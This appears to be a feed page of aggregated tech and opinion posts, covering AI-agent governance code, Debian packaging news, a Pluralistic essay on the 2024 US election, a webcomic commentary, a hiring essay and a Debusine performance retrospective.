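        return False  # budget exhausted: transition to SUSPENDED

budget = EscalationBudget()
print([budget.try_escalate() for _ in range(4)])  # [True, True, True, False]
```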

Confidence ≠ Authority. An agent may emit a proposal with confidence=0.99, and if that proposal exceeds contract authority, the Runtime rejects it. Self-assessed certainty is not permission.

Figure 3: HITL scales supervision cost with agent volume. HOTL shifts that cost to policy design—the human governs the production line, not individual decisions.

Wrapping, not replacing: The role of existing frameworks

Adopting the ROA pattern does not mean discarding the tools your engineering teams have spent the last year mastering. Frameworks like LangChain, AutoGen, and CrewAI excel at orchestrating complex reasoning loops, RAG pipelines, and tool use. ROA is not designed to compete with them; it is designed to govern them.

Figure 4: The ROA pattern wraps existing orchestration frameworks (like LangChain or CrewAI) in User Space, restricting direct execution and forcing output through a structured Policy Proposal validated by Kernel Space.

In practice, you can take a mature LangChain agent and wrap it inside an ROA boundary. The underlying framework still handles the probabilistic reasoning (User Space orchestration). The architectural shift is simple but consequential: you filter the framework’s tool space. You physically remove exchange.execute_trade() or db.drop_table() from the LangChain agent’s toolbox. Instead, you provide it with a single, sandboxed tool: emit_policy_proposal(). The agent reasons, iterates, and eventually calls that tool to emit its final intent. The ROA wrapper catches this claim, may perform a local self-check as a noise-reduction heuristic, and forwards the PolicyProposal across the boundary to the Kernel Space for actual enforcement. You keep the power of the framework, but you gain deterministic execution governance where it matters.
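The tool-filtering step is framework-agnostic and can be sketched without depending on any particular orchestration library. Every name below (`roa_toolbox`, the tool names, the blocked set) is illustrative:

```python
# Sketch: filter a framework's tool space so the only state-changing call
# left in the agent's toolbox is emit_policy_proposal().
proposals = []

def emit_policy_proposal(**fields) -> str:
    """The single state-changing call attributable to the agent."""
    proposals.append(fields)
    return "proposal recorded; awaiting Kernel validation"

SIDE_EFFECTFUL = {"execute_trade", "drop_table", "send_wire"}

def roa_toolbox(framework_tools: dict) -> dict:
    """Reads stay; writes are physically removed from the toolbox."""
    safe = {name: fn for name, fn in framework_tools.items()
            if name not in SIDE_EFFECTFUL}
    safe["emit_policy_proposal"] = emit_policy_proposal
    return safe

tools = roa_toolbox({"query_kb": lambda q: "...",
                     "execute_trade": lambda order: "..."})
print(sorted(tools))  # -> ['emit_policy_proposal', 'query_kb']
```

Whatever the agent reasons its way into, the worst it can do is append a typed claim to `proposals` for the Kernel to judge.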

Costs and trade-offs

ROA is not free. It introduces engineering overhead precisely because it replaces informal trust with explicit governance.

  • Validation gates and JIT checks add latency to every side-effectful decision.
  • Responsibility Contracts add design overhead: authorship, versioning, ownership, and review now have to be explicit.
  • DFID-linked auditability adds storage, tracing, and operational integration work.
  • Escalation thresholds and budgets require domain tuning; bad defaults either flood operators or hide legitimate exceptions.

These costs are justified only when the downside of an incorrect side effect is materially higher than the cost of controlling it. For RAG chatbots and low-risk assistants, this architecture is often excessive. For high-stakes systems, it is the cost of building a real boundary.

Conclusion: Architecture, not alchemy

Five pillars. One architectural commitment: an agent that cannot be trusted to govern itself must operate inside a system that governs it instead. The Responsibility Contract bounds authority. The Mission locks the objective. Epistemic Isolation ensures output is a claim, not a command. Longevity prevents the system from forgetting what it already learned. Audit makes every decision reconstructable. The ROA pattern—a Responsibility Contract instead of a capability list, Claims instead of Commands, a deterministic kernel instead of an informal prompt—composes these into a single enforceable boundary. Intent is structured by the agent. Boundaries are enforced by the contract. Telemetry is accumulated by DFID. The Human-Over-The-Loop model reserves human judgment for genuine exceptions, not approval queues. Together, they transform a probabilistic model into a governable production actor.

Once deterministic execution boundaries and DFID-linked telemetry are in place, a different class of day-three questions becomes possible: Which agents stay within limits yet quietly destroy margin? Which decision patterns justify automatic suspension before humans notice the drift? How do we reconstruct any action to a regulatory standard, and how do we govern a fleet where agents carry different risk profiles and decision weights?

Responsibility is the missing execution-governance layer—and it belongs in the architecture, not the system prompt.

The era of AI demos is ending. The era of AI production systems is beginning. Those systems will not be distinguished only by the intelligence of their models. They will also be distinguished by the rigor of their governance.


This article provides a high-level introduction to Responsibility-Oriented Agents and the Decision Intelligence Runtime (DIR) and their approach to production resiliency and operational challenges. The full DIR specification, ROA contract schemas, and reference implementations are available as an open source project on GitHub.

13:49

Representative Line: A Solid Reference [The Daily WTF]

Today's anonymous submitter works for a large company. It's one of those sorts of companies which has piles, and piles, and piles of paperwork and bureaucracy. It also means that much of their portfolio of software is basic CRUD applications. "Here's a database for managing invoices." "Here's a database for managing desk assignments." "Here's a pile of databases which link our legacy applications to our new ERP system."

Which brings us to our representative line. It is not a representative line of code, but a representative line of the design specification. This is the design specification for yet another database-driven application.

7.7 REFERENTIAL INTEGRITY CONSTRAINTS
Referential integrity constraints are not applicable for [REDACTED] Application.

Upon seeing this, our submitter predicted that they'd be having a lot of TDWTF submissions in their future.

The worst part? This isn't the only time this has been included in the design spec. Several database-driven applications have had this line in their spec. No one is able to explain exactly why referential integrity constraints are not applicable. At best, there are a few batch jobs that don't define a schema themselves, though they need to comply with it. Maybe someone is just copying and pasting from an old design spec and hoping no one notices or cares?

Good news: it's likely that no one will notice, or care. At least not until something breaks in production.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

13:35

Colin Watson: Free software activity in April 2026 [Planet Debian]

My Debian contributions this month were all sponsored by Freexian.

You can also support my work directly via Liberapay or GitHub Sponsors.

dput-ng

Ian Jackson reported that dput-ng could lose data when using the local install method (relevant in tests of other packages, for instance) and filed an initial merge request to fix it. I improved this to isolate its tests properly, and uploaded it.

groff

I upgraded from 1.23.0 to 1.24.1. 1.24.0 and 1.24.1 were the first upstream releases since 2023, and had extensive changes; I’d had the corresponding packaging changes in the works since January, but it took me a while to get round to finishing them off. It was good to get this off my list.

OpenSSH

I released bookworm and trixie fixes for CVE-2026-3497, and issued the corresponding BSA-130 for trixie-backports.

I upgraded from 10.2p1 to 10.3p1.

parted

I upgraded from 3.6 to 3.7. 3.7 was the first upstream release since 2023, but the changes were nowhere near as extensive as groff, so this was a fairly quick job. I also fixed the parted-doc package to ship proper API documentation.

Python packaging

New upstream versions:

I started an upstream discussion about how best to handle the pydantic and pydantic-core packages now that they share an upstream git repository.

Other bug fixes:

Rust packaging

New upstream versions:

YubiHSM packaging

I upgraded from 2.7.2 to 2.7.3.

Code reviews

12:14

LLMs and Text-in-Text Steganography [Schneier on Security]

Turns out that LLMs are really good at hiding text messages in other text messages.

11:28

Pluralistic: 2024 (apart from the obvious) (11 May 2026) [Pluralistic: Daily links from Cory Doctorow]


Today's links

  • 2024 (apart from the obvious): Some unforced errors.
  • Hey look at this: Delights to delectate.
  • Object permanence: Denmark legalizing music trading; Babysuit; Patent Office invites "peer review"; DRM protest at the Bastille; Scientology's "super powers"; Banana Dalek; Florida v pediatricians' gun safety advice; Copyright filters and wage theft; "Who Broke the Internet?" Vatican astronomer v Creationism; Teens, privacy and Facebook; Čapek's graveside robot; Save iTunes; NZ laundered money for Latinamerica's looters; Memex Method.
  • Upcoming appearances: Barcelona, Berlin, Hay-on-Wye, London, NYC, Edinburgh.
  • Recent appearances: Where I've been.
  • Latest books: You keep readin' em, I'll keep writin' 'em.
  • Upcoming books: Like I said, I'll keep writin' 'em.
  • Colophon: All the rest.



A meat grinder; disappearing into the top is a sad donkey dressed in Democratic Party livery; emerging from the bottom is a Trump-wigged elephant in GOP livery. The grinder bears an 'I Voted' sticker, with a ? added to the end of it. The background is a Dore engraving of a cloudy sky, tinted blue.

2024 (apart from the obvious) (permalink)

Just as Hillary Clinton positioned her run as a third term for Obama ("America is already great"), so did Biden (and then Harris) position their campaigns as a second Biden term. As Biden said (in 2019): "Nothing would fundamentally change":

https://www.salon.com/2019/06/19/joe-biden-to-rich-donors-nothing-would-fundamentally-change-if-hes-elected/

So a vote for Biden would be a vote for another four years of forceful, material support for genocide; another four years of compromise with the Democratic establishment on student debt and healthcare gouging; and another four years of a president who was obviously in mental decline.

Harris's campaign was, "A vote for me is a vote for all of the above (minus the cognitive decline)." Actually, it was worse: by conspicuously failing to campaign on the Biden administration's record on reining in corporate power, a vote for Harris was "A vote for all of the above, minus the mental decline and the antitrust."

Whereas a vote for Trump was a vote for change, a vote to give the establishment a black eye. It was also a vote for genocide and racist pogroms and gangster kleptocracy, which is why many voters stayed home, casting a ballot for America's all-time favorite candidate, "None of the above," while any number of furious people and/or vicious racists turned out for Trump.

There's one book that crystallizes my thoughts on this better than any other: Naomi Klein's 2023 Doppelganger, which analyzes our politics in terms of (warped) "mirror images." One of the mirror world pairings that Klein analyzes is the progressive movement, a coalition of liberals and leftists (led by liberals).

Like every coalition, the two main groups that constitute "the progressives" do not agree on many important issues, though they do have common goals. Both groups support equality for people of all genders and races, but for liberals, an equal world is one that fixes the problem that 150 straight white men own everything by replacing 75 of them with racialized people, women and queer people (whereas the leftist fix is abolishing the system in which 150 people own everything).

Biden set himself up as a peacemaker for this coalition, and his "unity task force" divided up the appointments in his administration between the Warren-Sanders leftists and liberals, including those who clearly belonged to the Manchin-Sinematic universe. This meant that his administration worked at cross-purposes to itself, neutering its boldest initiatives.

Take Biden's plan to finally allow Medicare to negotiate drug prices with pharma companies, a move that was very long overdue. Before this, the way the system worked was: pharma companies named a price – any price! – and then Uncle Sucker paid it. No other country in the world operates this way, and, of course, the lion's share of pharma R&D costs are already borne by the American public (or they were, until Musk DOGEd the US research budget to death).

So the American public pays more than anyone else in the world to develop these drugs, and then they pay more than anyone else in the world to buy these drugs. This is madness, and putting an end to it is an obvious political win. But Biden found a way to do it that "balanced" the leftist principle of protecting people from capitalist exploitation with the liberal principle of protecting businesses lest the essential function of developing life-saving drugs become a state activity (rather than a market one).

Biden's solution? A "Build Back Better" plan that would allow the federal government to negotiate up to ten drug prices (and as few as zero drug prices), but the new prices would only kick in after the 2024 election, so no one would see the benefit of this in time for the next general election:

https://pluralistic.net/2021/11/18/bipartisan-consensus/#corruption

This is a solution that pleases no one – and that's the point. Biden and his team viewed the presidency as an institution for making sure everyone was equally unhappy, a philosophy that Anat Shenker-Osorio calls "pizzaburger politics." This is named for a thought-experiment in which half your family wants pizza and the other half wants burgers, so you serve them "pizzaburgers" and make everyone miserable and declare yourself to have the fair-handed wisdom of Solomon (yes, I'm aware that this analogy has a fatal flaw in that pizzaburgers actually sound delicious, but work with me here).

Biden prided himself on running a pizzaburger presidency, in which every move that satisfied the left of his party was neutralized by a concession to the party's right wing establishment:

https://pluralistic.net/2024/05/29/sub-bushel-comms-strategy/#nothing-would-fundamentally-change

(Trump enacted a mirror-world version of Biden's pharma price controls: TrumpRx, a program that claims to lower drug prices while those prices actually go up):

https://democrats-energycommerce.house.gov/sites/evo-subsites/democrats-energycommerce.house.gov/files/evo-media-document/e-c-democrats-trumprx-big-talk-little-savings.pdf

Biden's pizzaburger compromises made everyone unhappy. He appointed generational talents like Lina Khan, Jonathan Kanter and Rohit Chopra to run key agencies charged with crushing corporate power, and then gave lifetime appointments to corporate-friendly judges who blocked their rulemakings and penalties:

https://www.aljazeera.com/news/2023/7/11/us-judge-turns-down-challenge-to-microsoft-merger-with-activision

Of course, it wasn't just Biden's own judicial appointees who stood in his way; from the Supreme Court on down, on issues from student debt cancellation to noncompetes, judges blocked the Biden administration. When this happened, Biden somehow couldn't find his way to his bully pulpit. Rather than working the refs – the way Trump does, in ways that energize his base, stiffen his legislators' resolve and intimidate other judges – Biden tinkered in the margins to find ways to advance half-measures and stayed mum in public.

This compromise-oriented meekness carried over into Biden's relationship with Democratic lawmakers who sold out the American people. Rather than campaigning for the primary opponents of monsters like Fetterman, Sinema and Manchin, Biden worked behind the scenes to broker compromises, delivering yet another inedible pizzaburger (and acting hurt and bewildered when no one thanked him for it). The alternative? Constitutional hardball:

https://pluralistic.net/2024/10/18/states-rights/#cold-civil-war

It's not clear whether Harris's abbreviated campaign could have made the public case that she would govern in a more muscular fashion as befitted the polycrisis facing the nation, but she didn't even try. A couple of Democratic Party insiders of my acquaintance tell me that Biden only agreed to step aside on the condition that Harris not criticize his record. I don't know if that's true, but even within that hypothetical constraint, Harris hardly presented herself as an avatar of change. She carried on Biden's tradition of conspicuously failing to campaign on the significant achievements of Biden's own trustbusters, and put her brother-in-law, the lawyer who helped Uber crush labor rights in California, in charge of her campaign:

https://www.nytimes.com/2024/08/04/us/politics/kamala-harris-tony-west.html

The point of all this is that the American people have, on two occasions, comprehensively rejected the "America is already great"/"Nothing would fundamentally change" politics of a liberal-dominated left/liberal progressive coalition. The senior partners in that coalition have driven the country into a ditch, letting Trump stage a fascist takeover that has us fighting not to win another election, but just to have another one.

Americans are sick of being told that their politicians can't do anything because "they're not the Green Lantern:"

https://pluralistic.net/2023/01/10/the-courage-to-govern/#whos-in-charge

America isn't already great. If we are to have more elections – much less win them – we will need to mobilize millions of people. You don't do that by telling them to oppose Trumpismo – you get them out in the streets by giving them something to support. That was Mamdani's winning message: "I know what a politician can do, and I will do it":

https://pluralistic.net/2026/02/24/mamdani-thought/#public-excellence


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago Denmark plans to legalize music trading https://edition.cnn.com/2001/TECH/internet/05/07/denmark.downloads.idg/index.html

#20yrsago Babysuit https://web.archive.org/web/20060513013815/https://www.gildlilies.com/pop_ups/phillip_toledano_kaleidoscope.htm

#20yrsago Patent office will ask the public to “peer review” inventions https://web.archive.org/web/20060512051743/http://www.dotank.nyls.edu/communitypatent/

#20yrsago Report from France’s DRM protest at Place de la Bastille https://web.archive.org/web/20170902135411/https://tofz.org/?dir=Paris%2Fevents%2FMarch

#20yrsago Interactive maps show your city’s floodline when the sea rises https://flood.firetree.net/

#20yrsago Scientology to open “Super Power” training center in FL https://web.archive.org/web/20060522112457/http://www.sptimes.com/2006/05/06/Tampabay/Scientology_nearly_re.shtml/

#20yrsago Homemade radios http://www.duntemann.com/radiogallery.htm

#20yrsago Vatican astronomer denounces Creationism as “paganism” https://web.archive.org/web/20060517013332/http://news.scotsman.com/international.cfm?id=674042006

#20yrsago Canada’s New Democratic Party embraces copyfighting musicians https://web.archive.org/web/20060520024734/http://www.ndp.ca/page/3713

#15yrsago Teens and privacy online: using Facebook is compatible with valuing privacy https://www.zephoria.org/thoughts/archives/2011/05/09/how-teens-understand-privacy.html

#15yrsago Ann Arbor library acquires lending, sharing and copying rights to Creative Commons music catalog https://annarborchronicle.com/2011/04/28/ann-arbor-library-signs-digital-music-deal/

#15yrsago Tin robot on Karel Čapek’s grave https://www.gilesorr.com/travels/Prague2011/BestPrague.20110421.6142.GO.CanonSX10.html

#15yrsago Just look at this banana Dalek. https://web.archive.org/web/20110716022131/https://www.daleksoftheday.com/2011/05/banana-dalek.html

#15yrsago NRA and Florida gag pediatricians: no more firearm safety advice for parents https://www.npr.org/2011/05/07/136063523/florida-bill-could-muzzle-doctors-on-gun-safety

#10yrsago Conservative economics: what’s happened to the UK economy after a year of Tory rule https://web.archive.org/web/20160509113126/https://www.independent.co.uk/news/business/news/what-has-happened-to-the-economy-under-the-tories-in-six-charts-a7017131.html

#10yrsago Save iTunes: how the W3C’s argument for web-wide DRM would have killed iTunes https://www.eff.org/deeplinks/2016/04/save-itunes

#10yrsago America’s courts are going dark https://www.justsecurity.org/30920/courts-going-dark/

#10yrsago Australian government issues report calling for copyright and patent liberalisation https://www.eff.org/deeplinks/2016/05/australian-productivity-commission-slams-protectionist-copyright-and-patent-laws

#10yrsago Panama Papers: New Zealand is the go-to money launderer for crooked Latin Americans https://www.rnz.co.nz/news/panama-papers/303356/nz-at-heart-of-panama-money-go-round

#10yrsago Safe Patient Project: searchable spreadsheet tells Californians whether their doc is on probation, and why https://web.archive.org/web/20160507002350/http://consumersunion.org/research/california-doctors-on-probation/

#5yrsago The Memex Method https://pluralistic.net/2021/05/09/the-memex-method/

#5yrsago How copyright filters lead to wage-theft https://pluralistic.net/2021/05/08/copyfraud/#beethoven-just-wrote-music

#1yrago Who broke the internet? https://pluralistic.net/2025/05/08/who-broke-the-internet/#bruce-lehman


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers..

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification: Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), FirstSecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus and Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

11:07

Grrl Power #1459 – Chemical Frenemies? [Grrl Power]

She likes him because he challenges her. And by “likes,” I mean she hasn’t killed him yet for challenging her. Or for being an arrogant ass.

No, the story about the MIT/CERN kid isn’t Deus’s backstory, but it apparently is a not-uncommon arc for child prodigies who grow up surrounded by a bunch of average brain types, then finally settle into some bleeding edge profession, and learn that they’re in the 50th percentile of the intelligentsia 1%.

I think exponential intelligence is genuinely incomprehensible, because individuals or groups at one intelligence level really lack the tools to understand a group that’s, for instance, ten times as smart. Of course, “ten times” is impossible for us to really quantify anyway, because “ten times” what? The word “intelligence” is really poorly defined in absolute terms. I mean, if you’re good at math but can’t remember dates and anniversaries, are you smarter than someone who struggles to add 15 and 7, but has an eidetic memory? Or is the world’s best astrophysicist smarter than the world’s best diplomat? One can figure out what dark energy is, the other can save hundreds of millions of lives by preventing wars. How much does emotional intelligence factor in? Without it, we’d have a world of sociopaths. At a certain point, information throughput becomes a limiting factor. Is a once-in-a-generation genius who secludes himself and occasionally publishes some revolutionary mathematical proof “smarter” than The Machine from Person of Interest? (That was a show where a massive supercomputer processed every video and phone call and text message, etc., and alerted the Feds to terrorist plots – which sounds terribly dystopian, but the inventor (the glasses guy from Lost) made it a closed system so the government couldn’t use it to spy. The bulk of the episodes revolved around the fact that it could also detect people plotting non-national-level crimes like murder, so the inventor put in a backdoor that would spit out a Person of Interest, and they wouldn’t know if it was the perpetrator or the victim. Anyway, I thought it was an entertaining show.) You’d probably say that The Machine in this case wasn’t intelligent at all, but throughout the series, it demonstrated an ability to learn and a non-human intelligence that allowed it to stay ahead of the evil government agencies and corporations that wanted to abuse its abilities.

The point is, actual capital-S Superintelligence is one of those things on Archon’s short list of Apocalypse-level threats, because it’s very likely that an individual with that ability could out-plot, out-plan and out-prepare the entirety of the rest of the human race. If Deus built a suit of armor or a rocket-powered paraglider and wore a goblin mask so he could rob banks, no one would give a crap about him on the macro level. Instead, he has the resources of a medium-sized-and-growing country and access to alien technology and probably demonic magic. So he’s being watched by a lot of agencies and interests. Some think he might become an exploitable resource, but they’re dumb. I mean, literally, compared to him, they’re very very dumb. Of course, that’s not to say he’s the only super intelligence on Earth. But most of the known ones are more like Digit: focused on tangible sciences and engineering, not his broader approach to economics, diplomacy and politics.

Obviously Deus has some broad-spectrum approach to resisting chemical influence in place. After all, he’s the leader of an up-and-coming, expanding nation, and seems to be, on the surface, doing a good job for the people under his administration. And he’s making enemies of every surrounding country and eventually he’s going to start hitting countries that third parties have financial interests in. Third parties like diamond oligopolies, mining consortia, all kinds of larger criminal organizations, and eventually, whole countries. Not to mention the Alari colony ship. They’ve agreed to live under his rule, but what that really means is they do whatever they want within their little fiefdom, which amounts to the area they’ve expanded their ship into, plus some extra land they negotiated with Deus, but outside of that, they’re subject to the laws of Galytn. They would immediately assume authority if something “happened” to him. That’s assuming they could keep Thothogoth from using Galytn as a foothold for his own conquest, or that either of them could stand up to the Supers in Deus’s military.

So Deus has some preventative measures and contingencies in place; they’re just not super overt, like the ones most comic book Super Smarts go in for. You know, an army of Deus-bots, or a metal throne room with Kirby-esque pipes and energy fields full of dots that project force fields that can only be deactivated after he delivers a monologue.


Sexy bodymod news lady Gail has a special one-on-one interview with Tournament quarterfinalist Saraviah Nightwing! And if you subscribe to Gail’s Space Patreon (which, due to the vagaries of Earth and Gal-Net’s DNS servers, happens to be the same as the Grrl Power Patreon, go figure) you can see that same interview in the nude! Well, eventually. The nude part of the interview, as well as the version that includes shading, will be coming soon. Of course, you can view the interview in the nude now if you take your own clothes off. You know. Technically. Just put a towel on your chair first.

 


Double res version will be posted over at Patreon. Feel free to contribute as much as you like.

10:35

The shared tragedy of Red Queen hiring [Seth's Blog]

Runaway selection happens when organizations compete with each other far beyond the point where it’s rational to do so. We see this in species as well–peacocks have ungainly and inefficient feather displays because, as Alice’s Red Queen said, “It takes all the running you can do to keep in the same place.”

In organizations, there’s a desire to do good work. Pressure to outdo the others. And a desire for deniability and certainty. Add those up, and we are left with a quest for more long after it’s helpful.

How many people applied for that good job you just posted? 1,000? Spread the word, more applications must be a good thing. It’s not unusual for digitally-amplified hiring processes to see 5,000 applications arrive in a day. 360,000 people applied for a slot in the Goldman Sachs internship program. Would a million have been better?

And then, let’s use AI to pick the 80 best candidates and interview each via Zoom.

Take the ten best and put them through a series of interviews, rotating through each person on the team, including aptitude tests and real-time projects. In many organizations, there are 6, 7 or even 10 rounds of interviews.

It costs a typical organization more than $14,000 to hire an executive, and the time and emotional cost to applicants is many times that. This all leads to lowered productivity, wasted time and a damaged brand.

What do we get in exchange for this investment? Are the people we hire with this exhausting/exhaustive process adding more value than the ones we found with much less time ten years ago?

And the second question: would your third or fourth choice have worked out just as well, if not better?

If Red Queen hiring actually worked, then we’d see that organizations that spend more time on it would outperform those that don’t. It’s pretty clear to me that this isn’t the case–it’s not an investment in the future, it’s a sign of bureaucratic stasis, a quest for deniability, and a thoughtless pursuit of the wrong sort of more. We’ve made it much easier for people to apply for jobs, but done little to improve what happens after the applications arrive.

What if we spent the time wasted on Red Queen maximization doing something useful instead–training and orientation, perhaps. Interview until you find someone who can do the job, then hire them. Then get back to work.

We can’t even ask that question, because it feels like a compromise. Without any data at all, we’ve bought into the Red Queen race, trusting that our false proxies, sufficiently polished, deliver better results. In fact, there’s a huge increase in the cost to the applicants and the organization, but no measurable increase in the value created.

Successful fishermen understand that casting an ever-wider net is not always the best way to catch the fish you need.

10:28

Debian embraces reproducible builds [OSnews]

Big news from the Debian release team: Debian is going for reproducible package builds.

Aided by the efforts of the Reproducible Builds project, we’ve decided it’s time to say that Debian must ship reproducible packages. Since yesterday, we have enabled our migration software to block migration of new packages that can’t be reproduced or existing packages (in testing) that regress in reproducibility.

↫ Paul Gevers

Reproducible means, in short, that rebuilding a package from its source code produces a bit-for-bit identical result, so you can verify that a package really was built from the source code it claims to come from. This provides a layer of defense against people tampering with code or otherwise trying to fiddle with the process between source code and final package on your system. This effort constitutes a tremendous amount of work, but it’s massively important.
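In practice, the verification step boils down to rebuilding in an equivalent environment and comparing the two results byte for byte. A minimal sketch (the function names here are illustrative, not Debian's actual tooling):

```python
import hashlib


def digest(package_bytes: bytes) -> str:
    """Return a SHA-256 hex digest of a built package."""
    return hashlib.sha256(package_bytes).hexdigest()


def is_reproducible(build_a: bytes, build_b: bytes) -> bool:
    """Two independent builds from the same source must be bit-for-bit identical."""
    return digest(build_a) == digest(build_b)
```

The real toolchain goes further than a yes/no answer: tools like diffoscope explain *where* two builds differ, which is what makes non-reproducibility debuggable.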

“Building a web server in aarch64 assembly to give my life (a lack of) meaning” [OSnews]

ymawky is a small, static http web server written entirely in aarch64 assembly for macos. it uses raw darwin syscalls with no libc wrappers, serves static files, supports GET, HEAD, PUT, OPTIONS, DELETE, byte ranges, directory listing, custom error pages, and tries to be as hardened as possible.

why? why not? the dream of the 80s is alive in ymawky. everybody has nginx. having apache makes you a square. so why not strip every single convenience layer that computer science has given us since 1957? i wanted to understand how a web server actually works, something i know little about coming from a low-level/systems background. the risks that come up, the problems that need to be solved, the things you don’t think about when you’re writing python or c.

this (probably) won’t replace nginx, but it is doing something in the most difficult way possible.

↫ Tony “imtomt”

I love this.

Object oriented programming in Ada [OSnews]

Ada is incredibly well designed. One way this shows is that it takes the big, monolithic features of other languages and breaks them down into their constituent parts, so we can choose which portions of those features we want. The example I often reach for to explain this is object-oriented programming.

↫ Christoffer Stjernlöf

Exactly what it says on the tin.

09:42

Freexian Collaborators: Debusine workflow performance issues (by Colin Watson) [Planet Debian]

During March and April, we had a number of performance issues that made Debusine’s core functions of running work requests and reflecting their results in workflows quite unreliable. Investigating and fixing this took up a lot of time from both the Debusine development team and Freexian’s sysadmins.

The central problems involved a series of database concurrency and worker communication issues that interacted in complex ways. On bad days, this caused between 10% and 25% of processed work requests to fail unnecessarily. We communicated some of the problems to users on IRC, but not consistently since we didn’t entirely understand the scope of the problems at the time.

Most of the problems are fixed now, but we had a retrospective meeting to make sure we understood what happened and that we learn from it. Here’s a summary.

Data model

Debusine’s workflows consist of many individual work requests. Each work request has a database row representing its state, which means that the overall state of a workflow is distributed across many rows. Changes to one work request (for example, when it is completed) can cause changes to other work requests (perhaps unblocking it so that it can be scheduled to an idle worker). Those changes may happen concurrently, and in practice often do.

Workers typically need to create artifacts containing the output of tasks: these include things like packages, build logs, and test output.

Debusine records task history so that it can make better decisions about how to schedule work requests. Since this might otherwise grow without bound, the server expires older parts of that history after a while. The same is true for many other kinds of data.

Causes

  • Because workflows involve changes that propagate between work requests, there were historically some cases where different parts of the system could deadlock due to trying to take update locks on overlapping sets of work request rows in different orders. We mitigated that somewhere around 2025-11-05 by locking entire workflows in one go before making any change that might need to propagate between work requests like this; that dealt with the deadlocks, but it’s quite a heavyweight locking strategy that sometimes caused significant delays.

  • We’ve been working for some time to make Debusine useful to Debian developers, and regression tracking is an important part of that: it lets developers test uploads without being too badly misled by tests in related packages that were already failing before they started. On 2026-03-11 we enabled this by default on debusine.debian.net, after testing it for a while. Although this is useful, it put more load on the system as a whole, often approximately doubling the number of work requests in a given workflow with many additional dependencies between them.

  • Like much of the world, we’re in an arms race with unethical scrapers desperately trying to feed everyone else’s data into LLMs before they run out of money. We saw a substantial uptick here towards the end of March, which meant that we had to temporarily disable regression tracking and to put some other mitigations in front of our web interface.

  • We historically haven’t had systematic internal timeouts. Prompted by ruff, a Google Summer of Code applicant went through and added timeouts in many places, including some calls between the worker and the server. This was fiddly work and the student did a solid job, so I’m not putting them on blast or anything! However, it did mean that some things that came in under load balancer timeouts now timed out earlier on the client side of the request (and hence in Debusine workers), which made some problems show up in different ways and be more obvious. This was deployed on 2026-04-03.

Fixes

Workflow orchestration

Figuring out what individual work requests need to be run as part of a workflow - the process we call “orchestration” - can be challenging. Unlike typical CI pipelines, these workflows often span substantial chunks of a distribution: a glibc update can involve retesting nearly everything! Nevertheless, it’s not particularly helpful for it to take hours just to build the workflow graph.

Fixing this involved many classic database optimizations such as adding indexes and CTEs, but probably the most effective fix was adding a cache for lookups within each orchestrator run or work request. Profiling showed that resolving lookups was a hot spot, and the way that task data is often passed down through a workflow meant that the same lookup could be resolved hundreds or thousands of times in a large workflow.
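The caching fix can be sketched as a per-run memo table. This is a toy model with illustrative names, not Debusine's actual classes; `resolve` stands in for the expensive database lookup resolution:

```python
class OrchestratorRun:
    """Sketch of a per-orchestrator-run lookup cache."""

    def __init__(self, resolve):
        self._resolve = resolve  # expensive resolver, e.g. a database query
        self._cache = {}         # lookup expression -> resolved result
        self.misses = 0

    def lookup(self, expr):
        # The same lookup can be requested hundreds or thousands of times as
        # task data is passed down through a workflow; resolve it only once.
        if expr not in self._cache:
            self.misses += 1
            self._cache[expr] = self._resolve(expr)
        return self._cache[expr]
```

Because the cache lives only for one orchestrator run, there is no invalidation problem: a fresh run sees fresh data.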

Expiry

We knew for quite some time that our expiry job took very aggressive locks, effectively blocking most of the rest of the system. This was an early decision to make the expiry logic simpler by allowing it to follow graphs without worrying about concurrent activity, but it clearly couldn’t stay that way forever.

